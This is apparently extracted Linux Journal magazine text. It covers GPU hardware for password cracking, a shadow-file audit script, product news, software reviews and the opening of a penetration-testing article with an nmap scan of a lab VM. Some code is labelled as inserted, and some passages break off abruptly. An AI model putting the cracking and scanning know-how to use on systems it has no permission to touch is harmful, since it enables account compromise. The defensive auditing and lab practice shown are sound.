This site provides a good list of available video cards and describes their performance: https://en.bitcoin.it/wiki/Mining_hardware_comparison. When you look at that site, what you’ll notice is that AMD GPUs tend to be much faster than NVIDIA GPUs, even though for gaming often the reverse is true. The reason for this is explained in detail in the explanation of why a GPU mines faster than a CPU, but in short, AMD GPUs tackle the problem of graphics rendering with a lot of small, simple chips that perform 32-bit operations quickly. NVIDIA GPUs have fewer, but more sophisticated chips that are closer to a CPU in complexity.
For the purposes of Bitcoin mining or password cracking, which can be highly parallel, that larger number of simple chips works the fastest. Also note that cracking software can take advantage of multiple GPUs, so if you can afford it, and your motherboard can support it, you may
find you’ll get the same performance out of two cheaper GPUs as a single expensive one.

In my case, I didn’t have a desktop PC lying around I could use for this, so I built a special desktop just for password cracking. In case you want to follow in my footsteps, here is my exact hardware along with prices:

- GPU: SAPPHIRE FleX 100312FLEX Radeon HD 6950 2GB: $280
- Power supply: RAIDMAX HYBRID 2 RX-730SS 730W: $60
- Motherboard: ASUS M4A88T-V: $95
- CPU: AMD Phenom II X6 1090T Black Edition Thuban 3.2GHz: $170
- RAM: Corsair CMX4GX3M2B2000C9 4Gb 240-pin DDR3: $55
- Storage: Seagate ST95005620AS 500GB 7200 RPM Hybrid Drive: $100
- Case: already owned
- Total: $760, $930 with monitor, $340 just GPU + PS

If you already have a desktop that supports a modern video card, you may need to purchase only the GPU and power supply. Keep in mind that modern high-performance video cards require a lot of power, so you’ll want at least a 700W power supply in your case, and more than that if you intend to chain two video cards together. I found that the AMD 6950 had good performance for my budget, plus this particular model can theoretically be turned into a 6970 with a firmware update. If you have a larger budget though, you may want to buy two or more 6950s and chain them together.

So there you have it. You now have a month to get your hardware together, and next month, I’ll discuss the software side of password cracking, explain dictionary, brute-force and mask attacks, and give specific examples with my password-cracking system.■

Kyle Rankin is a Sr. Systems Administrator in the San Francisco Bay Area and the author of a number of books, including The Official Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks. He is currently the president of the North Bay Linux Users’ Group.

Resources

Why a GPU Mines Faster Than a CPU: https://en.bitcoin.it/wiki/Why_a_GPU_mines_faster_than_a_CPU

Mining Hardware Comparison: https://en.bitcoin.it/wiki/Mining_hardware_comparison
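An added example, not from Kyle Rankin's article: a small audit that reads shadow-format lines, splits the password field on the $ delimiters described in the /etc/passwd and /etc/shadow section above, and reports accounts still on MD5 or with no password set. The function names, the sample entries, and the handling of an optional rounds= parameter, locked (! or *) fields and fields with no $id$ prefix are assumptions that go beyond the three ids the article lists.

```shell
#!/bin/sh
# Added example: report which hash scheme each shadow entry uses.

# classify_hash "<password field>": print the scheme name for one entry.
classify_hash() {
    case "$1" in
        '')        echo "EMPTY";  return ;;   # no password set at all
        '!'*|'*'*) echo "LOCKED"; return ;;   # password login disabled
        '$'*)      ;;                         # id, salt and hash follow
        *)         echo "LEGACY"; return ;;   # no $id$ prefix (assumed older crypt format)
    esac
    _id=${1#\$}         # drop the leading $
    _id=${_id%%\$*}     # keep the text before the next $
    case "$_id" in
        1) echo "MD5" ;;
        5) echo "SHA-256" ;;
        6) echo "SHA-512" ;;
        *) echo "OTHER" ;;                    # an id the article does not list
    esac
}

# hash_salt "<password field>": print the salt section.
hash_salt() {
    _rest=${1#\$*\$}                          # strip the leading "$id$"
    case "$_rest" in
        rounds=*) _rest=${_rest#*\$} ;;       # skip an optional "rounds=N$"
    esac
    echo "${_rest%%\$*}"                      # salt ends at the next $
}

# audit_shadow: read shadow-format lines on stdin and print "user scheme"
# for every account that needs attention (MD5, legacy format or no password).
audit_shadow() {
    while IFS=: read -r _user _field _ignored; do
        case "$_user" in ''|'#'*) continue ;; esac
        _scheme=$(classify_hash "$_field")
        case "$_scheme" in
            MD5|LEGACY|EMPTY) echo "$_user $_scheme" ;;
        esac
    done
}

# Constructed sample entries; the salts and digests are placeholders, not
# real hashes.
sample_shadow() {
    cat <<'EOF'
root:$6$CONSTRUCTEDSALT$constructedDigestNotARealHash:15340:0:99999:7:::
alice:$1$OLDSALT0$constructedDigestNotARealHash:15000:0:99999:7:::
bob:$6$rounds=5000$SALTBOB1$constructedDigestNotARealHash:15340:0:99999:7:::
daemon:*:15000:0:99999:7:::
carol::15340:0:99999:7:::
dave:!$6$SALTDAVE$constructedDigestNotARealHash:15340:0:99999:7:::
EOF
}

sample_shadow | audit_shadow
```

On a system you administer, the same check runs as root with `audit_shadow < /etc/shadow`.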
NEW PRODUCTS

Dustin Boswell and Trevor Foucher’s The Art of Readable Code (O’Reilly Media)

All the geeks among us who inhabit the programming subculture must admit to writing code that they’d be ashamed to show to Mom. In order to stay on Mom’s (and your boss’) good side, as well as add elegance to your work, pick up Dustin Boswell and Trevor Foucher’s essential new programming book The Art of Readable Code. The book, says publisher O’Reilly Media, “focuses on the nuts and bolts of programming, with simple and practical techniques you can use every time you sit down to write code.” Included are numerous practical tips, easy-to-digest code examples, helpful illustrations and cartoons to keep things entertaining. Other topics include picking variable names that are dense with information, organizing easy-to-understand loops and conditionals, creating effective comments, writing concise but thorough tests and mastering the art of breaking hard problems into smaller ones.

http://www.oreilly.com

Radical Breeze’s Illumination Software Creator

The hot selling point for Radical Breeze’s Illumination Software Creator, which was recently upgraded to version 4.1, is creating software without writing a single line of code. Illumination converts visual concepts into source code for the user; no virtual machine is involved. The developed applications run natively on desktops, iPhones, iPads, Android devices, Nokia (Maemo) Internet Tablets and HTML5 and Flash Web. And, now with v4.1 for Linux, Mac OS X and Windows, you can do that in a more expansive and bug-free manner. Although the recent version 4.0 added ability to create HTML5 Web applications along with an easier method of adding graphics to apps, the newer v4.1 now adds a “boat-load” of bug fixes, implements and other user-requested changes. Radical Breeze calls Illumination Software 4.1 “the most solid, bug-free release we have ever had. It is absolutely glorious”.
Who knew that programming could be so fun?

http://radicalbreeze.com
Logic Supply’s Neousys NUVO-1003B and NUVO-1005B Fanless Systems

The hardware maker Logic Supply specializes in systems for industrial and embedded applications, such as its new Neousys NUVO-1003B and NUVO-1005B Fanless Systems. The HPC NUVO systems feature Intel’s Core i5/i7 Mobile CPUs and HD graphics, and are housed in a durable, sleek chassis and feature an operating-temperature range of –25°C to 70°C. Targeted at machine vision, surveillance, medical imaging and networking applications, the devices come with the option for three or five Intel Gigabit Ethernet ports. I/O capabilities include one RS-232/422/485 port, three RS-232 ports, PS2 mouse and keyboard input, six USB 2.0 ports, VGA and DVI/HDMI video output, which combine to ensure ease of integration with legacy systems and next-generation applications alike, says Logic Supply.

http://www.logicsupply.com/nuvo
Tobias Klein’s A Bug Hunter’s Diary (No Starch)

Seemingly simple bugs, says author Tobias Klein, can have drastic consequences, allowing attackers to compromise systems, escalate local privileges and otherwise wreak havoc on a system. In Klein’s new book, A Bug Hunter’s Diary: A Guided Tour Through the Wilds of Software Security, readers will learn how to weed out bugs by following the tracks of a renowned security expert as he exploits bugs in some of the world’s most popular software, like Apple’s iOS, the VLC media player, Web browsers and even the Mac OS X (ahem, non-Linux) kernel. In this “one-of-a-kind account”, readers see how the developers responsible for these flaws patched the bugs—or failed to respond at all—gaining deep technical knowledge and insight into how hackers approach difficult problems and experience the true joys (and frustrations) of bug hunting. Readers will learn techniques on finding bugs, exploiting vulnerabilities like NULL pointer dereferences, buffer overflows and type conversion flaws, and developing proof-of-concept code that verifies the security flaw and reports bugs to vendors.

http://www.nostarch.com

BeyondTrust’s PowerBroker Identity Services Enterprise Edition

Give your identity-management woes a slick Jujitsu move with BeyondTrust’s PowerBroker Identity Services Enterprise Edition v6.1, a solution that allows for seamless integration of Linux, UNIX and Mac OS X with Microsoft Active Directory. New features in PowerBroker 6.1 include single sign-on, reporting improvements, single rpm/deb/pkg for installation, lwconfig tool for easy management of configuration changes and improved support for Mac .local domain names and network shares. With these enhancements, PowerBroker customers now can use free, open-source application integrations for enterprise applications, such as Apache Tomcat, IBM WebSphere, Oracle WebLogic and JBoss Application Server.
In addition,these updates offer the Open Source community the opportunity to providefeedback and bug fixes, as well as any other contributions to improve andaccelerate the development of the open-source tools.http://www.beyondtrust.com58 / JANUARY <strong>2012</strong> / WWW.LINUXJOURNAL.COM
Digium and Open Source Community’s Asterisk

We’re always thrilled to announce major upgrades from the pantheon of killer Linux apps, and this month’s star is the recently announced Asterisk 10. Asterisk is the most popular open-source platform to allow developers to create powerful business phone systems and unified communications solutions. Digium reports more than two million downloads in 2011 alone. In v10, Caretaker Digium and the dedicated crew of contributors have put forth a significant release whose most important new feature is its advanced, wide-band media engine, which supports studio-quality audio and a nearly unlimited number of codecs. By supporting high- and ultra-high-definition voice, says Digium, Asterisk now can be used to power communications applications that otherwise would have required specialized or expensive equipment and service in order to convey nuances in speech or emotion. New codec support is included for Digium Skype’s SILK codec and 32kHz Speex, as well as passthrough support for CELT. Other features include additional sampling rates, a new conferencing app, support for videoconferencing, new fax capabilities and text-message routing.
http://www.asterisk.org
Halcyon Software’s Audit Journal Manager

The latest offering from Halcyon Software—whose name appropriately means calm and carefree—is a new release of Audit Journal Manager, a specialist utility for IBM i that enables real-time alerting and reporting from the audit journal and assists with intrusion detection. Audit Journal Manager enables companies to receive immediate notification on any attempted security breaches, monitor and report on access to confidential information, save time on labor-intensive reporting tasks and assist in migrating to a higher security level. Key enhancements include improved performance, the addition of new reporting templates and new “rule” sets for monitoring auditing failure, security, service and systems management.
http://www.halcyonsoftware.com

Polaricon’s Jet Profiler for MySQL

This one is targeted at you MySQLers: Polaricon recently upgraded to v2.0 its Jet Profiler for MySQL—a real-time query-performance and diagnostics tool for DBAs and developers. Jet Profiler’s core features include query, user and table statistics, graphical visualization, low overhead and ease of use. It is available for Linux, Mac and Windows. Via a graphical interface, users are able to browse through profiling information and zoom in on dedicated problem areas, such as spikes in load, allowing users to identify and fix performance problems quickly. Besides adding German and Swedish language support, version 2.0 now offers adjustable time frames for data retention and a Top IP feature for monitoring heavy DB users and allowing for more effective load balancing.
http://www.polaricon.com

Please send information about releases of Linux-related products to newproducts@linuxjournal.com or New Products c/o Linux Journal, PO Box 980985, Houston, TX 77098. Submissions are edited for length and content.
NEW PROJECTS

Fresh from the Labs

EKO—Speedy Sound Editing
http://eko.sourceforge.net

If you’re sick of big, clunky sound editors and minimalist, feature-lacking editors, EKO may well strike the balance you’re looking for. According to the Web site:

EKO is a simple sound editor. EKO understands all popular sound formats (except MP3) and is useful in simple editing (cut/copy/paste) with minimal FX processing. External FX currently are not supported.

Installation

At the time of this writing, only the source was available—no binaries. But, fear not; installing by source isn’t hard.

Regarding library requirements, according to the documentation, you need Qt 4.x, libJACK, libsndfile and libsamplerate. Although this is true, as is always the case with source, you also need to install the -dev development packages in order to compile the source code.

Once the dependencies are out of the way, install EKO with the following commands:

$ qmake
$ make

If your distro uses sudo (such as Ubuntu), enter:

$ sudo make install

If your distro uses root, enter:

$ su
# make install

Once the installation has finished, you can run EKO with this command:

$ eko

Image: EKO—the lightweight sound editor in its sleek winter color scheme.

Usage

Inside the EKO screen, things actually are pretty easy and intuitive, and EKO’s main features are obviously placed. Right from the get-go, EKO is ready to open a sound file and start editing, and rather tellingly, the FX rack also opens at startup (an instant picture of the author’s feature wishes and EKO’s design principles).

Image: EKO is designed largely around using Jack, with the FX rack loading automatically.

Click Open file on the main toolbar, choose an audio file to edit, and let’s explore EKO’s features.

With a sound file on-screen, the obvious Start and Stop controls are in a bold purple, with a check box for looping on their left. Click anywhere on the wave, and you can play from there, select a section and loop it, and so on. However, the interesting bit is the FX rack window on the right.

As you’re no doubt aware, EKO uses Jack for its audio interface, and the effects in the FX rack need Jack to operate. However, keen observers will notice that at no time have I mentioned starting Jack in the instructions. As it turns out, EKO actually starts Jack for you with its default settings, if it’s not already running (thankfully, you also have the choice of running Jack with your own settings before starting EKO, after which EKO skips the Jack step).
Although the FX rack was quite limited at the time of this writing (only four effects in total: amplification, EQ, overdrive and pitch shifting), author Peter Semiletov has chosen wisely in implementing perhaps the most useful features before expanding EKO’s capabilities. While using Jack with effects generally involves some complicated routing, EKO’s use of its current effects already has the routing done for you.

If you want to immerse yourself more within the screen, you can choose View→Toggle fullscreen. If the color scheme is throwing you off, check out the palettes in the view menu (winter is my favorite choice).

If you want to tweak your settings further, look to the right of the window, and you’ll see four tabs. Click on tune. For the more superficial aspects, you can change the UI settings, such as font, icon size and window styling under the Interface tab. However, more important settings are in the other tabs, such as a large choice of keyboard shortcuts. Under the Common tab, you can choose the default format for new files and define the re-sampling quality for playback.

Eagle-eyed readers also will notice that EKO can down-mix 5.1 to stereo—perhaps this will be reason enough for many users to fire up EKO from time to time?

EKO is very speedy, and there is good reason for that: it loads the project files into RAM. Obviously, there’s a cost for this speed. You’ll need a lot of system RAM for this, and I assume larger projects will require something that uses the hard drive. It also seems to be an editing-only suite, not for recording, but who knows what direction it’ll go?

Nevertheless, this early project shows a lot of promise as a genuinely fast, simple and usable editor that fills a niche between Goliaths like Ardour and simpler programs that are just too limited.
I’ll be interested to see where Peter takes it.

QLC—Free Lighting Control
http://qlc.sourceforge.net

My last article covered the OLA lighting project with the Arduino RGB device, and because of some dependency problems at that time, I had to skip over the recommended QLC application and use the given Web interface.

However, now I’m delighted to say I’ve got QLC working without a hitch, and I cover it here (although I should mention, QLC is in no way connected with the Arduino RGB or OLA projects, but is for lighting in general).

According to the Web site:

Q Light Controller is a cross-platform application for controlling DMX or analog lighting systems like moving heads, dimmers, scanners and so on. The goal is to replace hard-to-learn and somewhat limited commercial lighting desks with FLOSS.

Installation

If you’re chasing a binary, packages are provided for Debian, Ubuntu, Red Hat, Fedora and Mandriva. If you want (or need) to go with the source option, you first need to install Subversion, as that is the given option for attaining source with QLC. As for library requirements, the documentation gives the following for Debian and Ubuntu: g++, make, libqt4-dev, qt4-dev-tools, libasound2-dev, libusb-dev, subversion, debhelper and fakeroot.

Ubuntu further requires libftdi-dev and pkg-config.

Whereas Red Hat/Fedora users need gcc-c++, qt4-devel, libftdi-devel, libusb-devel, alsa-lib-devel, rpm-build and subversion.

If you prefer the source, make a folder in which you want to build QLC, and then open a terminal in that new directory. Now, enter the following commands:

$ svn checkout https://qlc.svn.sf.net/svnroot/qlc/trunk/ qlc
$ cd qlc
$ svn update

A quick note: any Arduino RGB and/or OLA users will have to enable a plugin, which also requires using the source via svn. If you’re pursuing this option, grab the source as above, and edit the plugins.pro file in the plugins folder.

Uncomment the following line by changing this:

#unix:SUBDIRS += olaout

to this:

unix:SUBDIRS += olaout

(Of course, all other users can ignore this section and continue.)

Now, to compile the program, enter:

$ qmake-qt4
$ make

To install QLC, if your distro uses sudo (such as Ubuntu), enter:

$ sudo make install

Image: When editing scenes, you can play with lighting effects in real time.
If your distro uses root, enter:

$ su
# make install

To run the program, use this command:

$ qlc

(Note: OLA users should start olad before running QLC.)

Usage

Inside the program, QLC’s interface is spread into five main sections: Fixtures, Functions, Outputs, Inputs and Virtual Console. To start using QLC, click on the Fixtures tab. Here in Fixtures, you tell QLC what lighting hardware you’re using and define its parameters.

Like the giant text suggests, click the + button to add fixtures. This brings up a new window with an array of lighting fixtures from which to choose. My correspondent, Heikki Junnila, was using the Eurolite LED PAR56 model, which he set to Address 1, Universe 1, with Amount 1. With my humble little Arduino, the model was Generic→Generic, which was set to Universe 1, Address 0, and the Channels were set to 6 (the number of lights I had attached to the board).

With the fixtures defined, it’s time to interact with the hardware by making a scene.

Click on the Functions tab, and in the Functions toolbar, you’ll see a series of new icons. Click the button on the left, New scene, and a new window appears. Click the + button and choose the fixture to be used (likely just one if it’s your first time). Back in the scene window, you probably should enter a name in the given field before proceeding further. But, to do something interesting, click on the second tab, which will be named after the fixture type (“Dimmers” in my case).

Here you can play with your lighting device in real time, experimenting with the look of a scene, then committing the lighting scene later. Back in the General tab, if you look down at the bottom of the window, there are some lovely Fade In and Fade Out options, which I promise will look fantastic if you try them.

While I’ve shown you how to make one scene, you should repeat the same steps for a second scene, but with different values (perhaps activating different lights or different levels). This way you can explore the Chaser function with an obvious visual transition to show off its abilities.

What is this Chaser function, you ask? Basically it’s the means to string together your scenes. With functions, such as looping and sequences, chasers are really what turn your scenes into an actual show.

To use them, simply head back to the window where you made the scenes, and on the toolbar, click the next button along from New scene (yes, the little green arrow in the orange ball), and this brings up the Chaser editor.

In the new window, first give your chaser a name. Now, press the + button, choose the scenes you want to add, and click OK. Back in the Chaser editor window, you can dictate how the whole sequence works, right down to the order in which the scenes run, whether they loop or play once through, and the duration. This window is really where the design aspect comes to the fore.

As I’m running out of space, let’s jump to the Virtual Console, where I guess you could say the live direction happens. The basic idea is that you place a button somewhere in the workspace and then link it to something like a scene, effect or chaser. This way, you can have a series of labeled buttons, so if you’re lighting a stage play, for example, you can click a button to have specific lighting for one scene and then click another button to change the lighting for the next.

The first button on the toolbar makes the new button, placing it in the workspace below. Then, right-click the button and choose Properties. Here you do all of the usual stuff, like labeling the button, but most important, you need to choose the function it activates, and the icon with the attached plugs does this. Choose the functions you want to activate, click OK, and then click OK again in the Button window to head back to the main screen.

Image: A very basic demonstration of two buttons in Operate mode, linked to two scenes.

Image: A preview shot of the upcoming QLC release in full flight—much more impressive than my lame demonstrations!

Now for one last instruction. If you left-click the button now, nothing will happen. See that big blue Play button above? Click that, and it switches QLC to Operate mode (it also changes to a Stop button, which switches back to design mode when you’re done).
Click your buttons now, and hey, presto, your lighting effects are running by your command!

Although total novices may find QLC to be hard to come to grips with initially, the interface is actually very well thought out, and after you’ve been through the process once, things should come to you intuitively. It also appears to be quite extensible in design, so I imagine it will become rather powerful as time goes on.

Hopefully, Q Light Controller eventually becomes the easy choice for anyone new to lighting, those on a budget, or maybe it even will persuade some away from their expensive proprietary software!

John Knight is a 27-year-old, drumming- and bass-obsessed maniac, studying Psychology at Edith Cowan University in Western Australia. He usually can be found playing a kick-drum far too much.

BREWING SOMETHING FRESH, INNOVATIVE OR MIND-BENDING? Send e-mail to newprojects@linuxjournal.com.
REVIEW

SlickEdit

For the minimalist programmer, there’s vim. For everybody else, there’s SlickEdit. SHAWN POWERS

I fell in love with SlickEdit a few years ago when I noticed its ads on our Web site. Although most companies use the sort of Web ads you’d expect in the tech industry, I took a second look when LOLCat images appeared in the place of our regular ads. Admittedly, for a moment I thought perhaps we’d been hacked, but when I realized I was looking at a clever marketing campaign, I decided the folks at SlickEdit were okay in my book. I recently had the chance to review SlickEdit, and although my programming skills are fairly novice, SlickEdit made me feel right at home.

SlickEdit is a text editor designed for programmers. Calling SlickEdit a text editor, however, is much like calling the DeLorean from Back to the Future a daily driver. SlickEdit makes the line between text editing and full-blown IDE pretty fuzzy. It is available for nine platforms, and, thankfully, Linux is one of them. In this review, I take a look at its features, and you can decide whether it’s a text editor, IDE or something in between.

Installation

Installation is fairly straightforward if you’ve ever installed a closed-source application in Linux. Both 32- and 64-bit versions are available, and on the handful of systems on which I installed it, I didn’t run into any problems with dependencies. The installation must be performed on the command line, as there is interaction during the install (Figure 1). By default, the program is installed into the /opt/slickedit directory. (Thanks to the SlickEdit folks for not using weird capitalization in the installation directory; that is so frustrating.)

Figure 1. Installation must be done on the command line; there is no GUI installer.

Starting SlickEdit the first time is a little cumbersome, because the installer doesn’t appear to make any icons in the system menu or on the desktop. A desktop icon is created after the first launch of SlickEdit, but you have to get past the catch 22 of needing to start the program to create the program startup icon. The executable to start SlickEdit by default is /opt/slickedit/bin/vs, and typing that in a command shell starts the program and its initial wizard right up.

During the Quick Start Wizard, you start to see some of SlickEdit’s neat features. Figure 2 shows the configuration screen for selecting keyboard emulation. If you’re used to a particular set of keybindings (like vim in my case), SlickEdit can use those familiar keybindings by default. You even can customize the emulation if your needs don’t line up with the dozen-plus emulation options offered.

Figure 2. The keystroke emulation makes SlickEdit behave like your favorite editor.

One of the other neat features configured during the initial wizard phase is the customization of how you prefer your code to look. Figure 3 shows indentation and brace-style configurations that can be set for all languages. The indentation and methods for displaying braces and parentheses certainly don’t change the compiled product, but they make code look however you prefer. And, a happy coder is an efficient coder, right?

Figure 3. If SlickEdit is going to save time, it needs to know how you prefer to format your code.

You can change many other initial settings, such as color themes, font size and choice and so on. Once configured, you even have the option to export your settings so they can be imported on another machine. It’s a great feature if you use SlickEdit at home and at work, in order to ensure your developing environments match.

Initial Impression

Once the initial quickstart is complete, it’s easy to be overwhelmed by the feature set. Thankfully, although SlickEdit boasts an incredible number of features, understanding them all isn’t a prerequisite for coding. As shown in Figure 4, I jumped right in with a simple Bash script to see how well it handles code formatting. As expected, it looks and behaves quite nicely.

Next, I tried to work with one of SlickEdit’s new features, namely Git repository interaction. Here, I was met with some frustration. Although I could get SlickEdit to recognize my local cloned Git repository,
Keyboard Emulation

As I mentioned earlier, this is an advantage for coders coming from other programs. The ability to customize individual keystrokes is nice, but it’s the built-in support for other familiar program keybindings that makes this feature so great. Emacs fan? You don’t need to learn new keystrokes to edit your code. Vim master? Same deal—you can save and close a file like God intended by pressing :wq.

Language Support

As a programmer, I’m personally limited to a handful of languages. In fact, when it comes to Java, I can’t even say hello to the world. SlickEdit takes me to task in this department, supporting more than 40 languages. To be fair, some of those languages are specific to their platform (that is, Microsoft), but I couldn’t think of a single language it doesn’t support.

One of the advantages of using a tool like SlickEdit is that because it knows languages you might not be intimately familiar with, it’s a great tool for jumping right in to unfamiliar code with unfamiliar syntax (which leads to my next favorite feature).

Autocompletion

Although not exactly SkyNet-type artificial intelligence, SlickEdit does save time by automatically completing your commands—and with the proper language-specific syntax. For example, if you type for and press the spacebar inside a C++ document, SlickEdit automatically creates the parentheses and curly braces needed to complete the conditional loop. I find this incredibly helpful when switching between languages, because compilers aren’t as forgiving with incorrect syntax as the human brain might be.

Autocompletion doesn’t stop with code syntax, however; SlickEdit also autocompletes any symbols or words while you type. This is great for long symbols or variable names. SlickEdit searches your open document in real time for matches and pops up a box with the matches it finds.
If you don’t want to use autocomplete, simply ignore the pop-up box and keep typing. Focus isn’t taken away from what you’re typing.

Backup

As I’ve mentioned, SlickEdit supports revision control systems like Git, but it also keeps a history of changes every time a file is saved. Even if you haven’t committed your changes, you still can see the history of changes made to your files. Access to the save history really can save your bacon if you accidentally save an error by mistake.

DIFFzilla

SlickEdit uses a tool called DIFFzilla to compare files. It’s also possible to compare folders full of files or active buffers in the editor. What makes DIFFzilla great is that it does its best job to reformat non-compilable differences (like whitespace or line breaks where they don’t matter) in order to display the code side by side. This may seem like a minor feature, but it makes comparing files line by line a breeze. In fact, you can edit the code directly from the DIFFzilla window, and the updates are written back to the location where you opened the file. Figure 5 shows DIFFzilla in action.

Figure 5. DIFFzilla adds things like the “Imaginary Line Buffer” in order to line up code so it’s easier to see.

Code Templates

For programmers who use chunks of code over and over (the foundation of FOSS, no?), SlickEdit supports code templates. Basically, any common coding elements can be saved as a template and used in a project easily. Re-using code isn’t revolutionary by any means, but the templating system makes it easy to do. By using templates, there is no longer a need to search/replace the files to make it match your project. SlickEdit automatically changes the specified parts of the template to match your needs.
Regex Testing

Life without regex would be hard to sort through. Bad joke, I know, but as powerful as regular expressions can be, they also can be mind-bending, especially after a long day of coding. SlickEdit includes a “Regex Evaluator”, which lets you test your regular expression in real time against test data. It doesn’t guarantee your regex will be perfect, but the real-time testing can help eliminate silly mistakes.

Macros

Programmers love to re-use code, but they also tend to repeat the same tasks over and over as well. SlickEdit has a nifty macro-recording feature, so that you can assign a keyboard shortcut to a process you need to do often. It can be as simple as a key to add/remove a comment, or it can be as complicated as rewriting sections of code.

If you have complex macros to create, SlickEdit includes its own programming language specifically for macros. Slick-C has extremely complex abilities that can interact with just about every facet of the SlickEdit program. If you generally go through a long list of procedures when you start a new project, SlickEdit can be programmed to do them for you with a single keystroke. Information on the Slick-C language is available on the SlickEdit Web site.

Magic Paste

No, I’m not talking about that stuff you ate in kindergarten, but plain-old copy/paste. When you paste a chunk of code from one place to another, SlickEdit will match indentation and brace placement automatically. It’s another feature that doesn’t affect the compiled code, but it makes the source much easier to read and less embarrassing to share.

Built-in Command Line

A feature I bet Windows programmers appreciate even more than we do in Linux is the built-in command-line interface. Once activated, the command line offers a set of commands that can be accessed command-line-style. Its similarity to the Linux command line might be a little confusing, because although some of the output is similar (typing ls for instance), it’s not truly a Linux shell. For quick mouse-free file interaction, however, it is worth the effort to learn the commands available.

New Features

If you’ve been a SlickEdit user in the past, you’ll likely find SlickEdit 2011 (version 16) has a few really great enhancements. Notably for Linux users are the following:

* 64-bit version for those using 64-bit Linux.
* Ruby debugging.
* Git support.
* Multithreading.
Although most of the new features are self-explanatory, the multithreading is more than just minor code efficiency. In the past, when parsing source code for tagging, SlickEdit would force the user to wait. Now, a little box pops up telling you it’s working in the background. For large projects with lots of files, this seemingly insignificant feature can save tons of time.

Conclusion

SlickEdit is an amazing tool. As a novice programmer, I barely scratched the surface of its full abilities, but even so, I found it’s extremely useful. One of my favorite features is the keyboard emulation, which makes the learning curve a little less steep. Although its features make it ideal for a full-time, professional programmer, unfortunately, so does its price. At $299 for a single user license, SlickEdit isn’t for everyone, but for programmers working in an environment where time is money, its time-saving features alone will pay for itself in short order.

Apart from a few minor issues, like the lockups when trying to configure Git, SlickEdit was very stable during my testing. The GUI itself seems to use a proprietary toolkit, or one I’m not familiar with. The menus behave strangely from time to time, and they refuse to close occasionally, requiring me to click off the main window to get it to behave properly. It’s possible that is just some strange conflict with my Xubuntu desktop, and it isn’t a showstopper by any means.

If you want to try SlickEdit, there is a free 15-day trial, which includes help from the SlickEdit support team. If you’re an Eclipse user, there is the SlickEdit core editor as a plugin for Eclipse. Both options are available from SlickEdit’s Web site: http://www.slickedit.com.

Shawn Powers is the Associate Editor for Linux Journal. He’s also the Gadget Guy for LinuxJournal.com, and he has an interesting collection of vintage Garfield coffee mugs. Don’t let his silly hairdo fool you, he’s a pretty ordinary guy and can be reached via e-mail at shawn@linuxjournal.com. Or, swing by the #linuxjournal IRC channel on Freenode.net.
A Penetration Tester’s Toolkit

Ever wonder exactly how vulnerable your network is? Using these tools can give you an idea and provide the means to protect yourself.

MATTHEW AGLE

Figure 1. Windows XP Machine

but need the strength of Metasploit (for scripting and grouping tests together). Even though they all get the job done, it depends on your situation as to how you use these tools.

The first thing to do is install these tools. Because this article is in Linux Journal, I assume you’re running this on a Linux platform, but all of these tools work on Windows as well. You could install these tools from your repositories, but I recommend going to each tool’s Web site and installing from its packages (this ensures that you get the latest version with all current fixes and gives you the best success for installation). Installation is pretty straightforward; just follow the steps from each tool’s respective site, and you’ll be fine. As soon as the tools are installed, it’s time to start playing with them. I highly recommend that you have either a virtual machine or a test machine of some sort as your first target, so as not to crash anything critical. Nothing’s worse than running a scan against a box, only to find out that you crashed it by accident (very high possibility with Nessus and Metasploit, depending on what you are doing) and interrupted someone’s work.

Figure 2. Scanning Machine

For the purpose of this article, I’m going to set up an example scenario. I am going to use a virtual machine with Windows XP (SP3) loaded on it to run these three tools against. This machine will be a fresh install with no patches and the firewall disabled. The reason for this, quite simply, is to be realistic when running these scans. More often than not, I have come across this very machine, sitting in a corner, collecting dust and running some sort of old-mission-critical app (I’m sure
you’ve encountered something similar). Especially in large environments, these machines are very easy to forget about and can give you the biggest amount of trouble. I have configured the host machine to use an IP of 192.168.56.1, and the guest machine to use an IP of 192.168.56.101.

Let’s start with Nmap to begin the information-gathering stage (you have to know what you’re working with) on your target. Because you know the IP of the machine in question, you don’t have to, but just as easily could run a scan against a subnet or some other subset of IP addresses. For this article, let’s stick with 192.168.56.101. In your terminal, run the following (remember that you can run this command as a regular user on the machine, as long as said user has access to /usr/bin/):

nmap -sV -A -v 192.168.56.101 > /tmp/nmap-output

I always send the output to a file, as it’s easier to read through afterward. Before delving into the output, however, let’s look at those switches:

* -sV — this tells Nmap the type of scan. In this case, it’s a version scan to see what programs are running on what ports (where available).
* -A — this tells Nmap to run a fingerprint check. This means Nmap will attempt to identify the version of the OS and any related information correctly.
* -v — verbosity—this is important, as you need this to get critical information from Nmap.

NOTE: When it comes to tools like Nmap, man pages are your friend. Remember that these tools are extremely complex and have a lot of functions, and that means a lot of switches. When in doubt, always refer to the man pages, lest you use the wrong switch and accidentally crash a box (easily done with tools like Nessus).

Listing 1 shows the output of the previous command.

As you can see from the output in Listing 1, you can identify that this is indeed a Windows platform, most likely XP, with service pack 2 or 3 or 2003 server.
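Because the scan output is saved to a file, the reading of Listing 1 can also be checked mechanically. The following Python is an added example, not code from the article or from the Nmap project; the function names, the finding labels and the choice of ports 135, 139 and 445 as the ones to flag are assumptions of this example, and the sample input is an excerpt of Listing 1 with its line breaks restored.

```python
import re
from collections import namedtuple

# Excerpt of Listing 1 from the article, with line breaks restored.
LISTING_1_EXCERPT = """\
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5B:91:AC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
"""

# "Nmap scan report for <ip>" or "Nmap scan report for <name> (<ip>)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([^\s()]+)\)?$")
# One row of the port table: "445/tcp open microsoft-ds <version text>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.+))?$")
# Entries of the "Not shown:" summary, e.g. "997 closed ports"
UNLISTED_RE = re.compile(r"(\d+) (\w+)(?: \w+)? ports")

# Assumption of this example: the Windows RPC/NetBIOS/SMB ports that a host
# firewall would normally keep away from untrusted networks.
FILE_SHARING_PORTS = {135: "MS-RPC", 139: "NetBIOS session", 445: "SMB"}

Port = namedtuple("Port", "number proto state service version")


class Host:
    def __init__(self, address):
        self.address = address
        self.ports = []       # Port tuples from the port table
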